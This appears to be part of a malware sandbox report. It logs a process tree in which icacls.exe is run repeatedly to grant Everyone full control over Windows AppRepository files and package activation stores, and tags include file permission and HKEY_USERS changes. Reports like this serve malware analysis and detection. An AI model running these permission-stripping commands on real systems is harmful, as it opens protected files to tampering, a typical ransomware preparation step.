-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_2017.222.1920.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.PPIProjection_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-100_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_~_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_2016.511.9510.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
